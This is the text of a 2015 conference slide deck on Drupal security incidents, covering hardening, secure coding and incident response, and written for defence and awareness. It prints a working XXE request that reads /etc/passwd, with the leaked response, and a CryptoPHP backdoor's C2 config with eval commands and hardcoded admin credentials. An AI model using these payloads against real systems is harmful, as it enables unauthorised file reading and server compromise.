Drupal, lessons learnt from real world security incidents

Drupal, Lessons learnt from real world security incidentsDr. Pedram HayatiPartner and Security Consultant elttam

DrupalGlamp, Sydney, 5 September 2015

Drupal SecurityLooking from an attacker angleTargeting the software• Publically known weaknesses or 0days• Drupal core or modules

Targeting a user• Social engineering

Targeting a developer• Watering hole attacks

What a security tester should know!Security is not a high priority• Sad but true• If a software is not usable, it doesn’t matter it is secure or not.• Security tester is not the only stakeholder

Learn the terminology• Defect and bug instead of 0day and vulnerability• Enhancement instead of best practice recommendation

Explain “how to fix” not “how to break”• Security tester excited to show how to hack the planet• Dev care about how to effectively fix things• One size doesn’t fit all.• Spend a lot on issue detail but less on remediation plan.

Show some respect!• Bashing developers and being negative toward them.

Targeting software

Pre-Auth SQL Injection in Drupal Core15 October 2014• A major SQL injection vulnerability with in Drupal Core

CVE-2014-3704• Likelihood: Pre-auth• Impact: privilege escalation, code execution• You are likely compromised if you haven’t patched your Drupal within

7 hours of this issue being announced. • https://www.drupal.org/node/2357241

Hardening - GenericRemember, Drupal has a higher risk profile. • Subscribe to security feeds• Have backups and make sure they work• Be ready and prepare your (basic) incident response strategy• References

Drupal security feed: https://www.drupal.org/security/psa Security team contact: https://security.drupal.org/team-members Incident response plan:

http://www.comptechdoc.org/independent/security/policies/incident-response-plan.html

https://twitter.com/drupalsecurity

Hardening – Secure codingPrinciple #1: Defend as close as possible to destination• Use parametrized queries

Use db_query() and db_rewrite_sql() and never concatenate the data• Use Drupal’s check functions for output filtering

Use check_plain(), check_markup(), check_url and filter_xss() • There is no JavaScript validation

Principle #2: It is not just input and output handling• Understand Cross-Site Request Forgery (XSRF)• Use Form API

Principle #3: File upload is difficult to secure• Avoid file upload where possible• Re-produce the file (e.g. GD library)• Check Mime, magic numbers, byte codes.

Hardening – Secure codingPrinciple #4: Remember hash algorithm is ever evolving• Md5 = plaintext. Sha1 ~= plaintext• Use a slow hashing algorithm

Scrypt -> bcrypt (15 rounds)-> PBKDF2 with SHA256• Salt the hash• Use Hash-based Message Authentication Code (HMAC)• drupal_hmac uses sha256 that is not recommended.

Pre-Auth XXE24 March 2015• XML External Entity (XXE)

XML document has a reference to user controllable field that include an external entity

• A weakness within Service module• Allow arbitrary file read (e.g. settings.php)• By Renaud Dubourguais from Synactive on 24 March 2015• http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf

Pre-Auth XXE: Sample payloadPOST /drupal­7.28/?q=test/node HTTP/1.1[...]<!DOCTYPE root [<!ENTITY % evil SYSTEM "file:///etc/passwd">%evil;]><xml>        <test>test</test></xml>

Pre-Auth XXE: Response<?xml version="1.0" encoding="utf­8"?><result>Line 5, Col 9: failed to load external entity &amp;quot;file://W00Tcm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCg==W00T&amp;quot;Line 9, Col 27: Opening and ending tag mismatch: test line 9 and type</result>

Pre-Auth XXE: Reponseroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww­data:x:33:33:www­data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin

How to fix it?Input validation?Output validation or rendering?Business logic• Access control

Targeting user

CryptoPHP20 November 2014 by Fox it• Large number of backdoored CMS including Drupal, Joomla and

Wordpress• Use for Blackhat SEO

CryptoPHPC2 communication{

"servers":­["127.0.0.1",­"127.0.0.2"],"eval":­["print(system('ls­-la'));",­"phpinfo();"],"echo":­["strings­to­be­echoed",­"etc."],

­}Mail communication• For failover

Manual control• http://127.0.0.1/index.php?<serverkey>=reset

Encrypted communicationAdds a new admin account for future access• Username: system[0-9]*• Password: FUHIAsbdiugAS

CryptoPHPSpread through• Pirated themes• Commercial plugins for free• Nulled scripts

RemediationLook inside your theme (and modules) directory for:

<?php­include('images/social.png');­?>

Check the authenticity of your packages• Use legitimate sources

Check the integrity of the downloaded packages• Checksum

More info: https://foxitsecurity.files.wordpress.com/2014/11/cryptophp- whitepaper-foxsrt-v4.pdf

Targeting developer

Watering Hole AttackAn attack strategy targeted toward user groups• Developers, operations, normal users

Commonly a website that is used by the victim group is infected. The victim group will be eventually infected through infected website.November 2014• Forbes.com compromised• 0day for IE and Flash• Target

US defence Financial services

AwarenessDevelopers• Typically have high privileged access on the local machine or network services• Increase security of your browser

Addon: NoScripts Addon: Web of Trust (WOT) Use different profile or browser for surfing web and doing work Have a read about capabilities of BeEF framework

http://beefproject.com/ • Increase security of your email client

Increase security settings of Outlook Default all emails to plain text

Keep personal and work email in a separate email clients Even on your smart phone

• Use trusted sources• Verify the integrity of downloaded files

Unhack my website1. Make a (forensic) copy of your entire server

1. Do not change anything2. Get an snapshot of your Cloud/VM instance

2. Take your website offline3. Notify users and stakeholders.4. Start the investigation progress

1. It is likely automated. Search for known signatures2. Check integrity of all files

1. Drupal Hacked module: https://www.drupal.org/project/hacked 3. Use available tools

1. Sort files and other data base on time2. Create a timeline

4. Call for help5. Rebuild your website

1. Restore an older snapshot 2. Apply all patches.

BonusAn actual attack can come days later• There are different threat actors are behind attacks:

https://blog.smarthoneypot.com/in-depth-analysis-of-ssh-attacks-on-amazon-ec2/ • Go back in time

Malware names are randomised • Look into outbound network connections• tcpdump

Malware are renamed to a legitimate executables• Your best friends

lsof strace nestat

Wrap upMy point was to provide you with awarenessAttackers find easiest and most effective way to target• Software• Users• Developers

Keep up-to-date with Drupal security feedGet yourself engaged in local security communities.

Thank YouTo receive recommendations on protecting your Drupal, reach me at:Email: [email protected]: pi3chWeb: https://elttam.com.au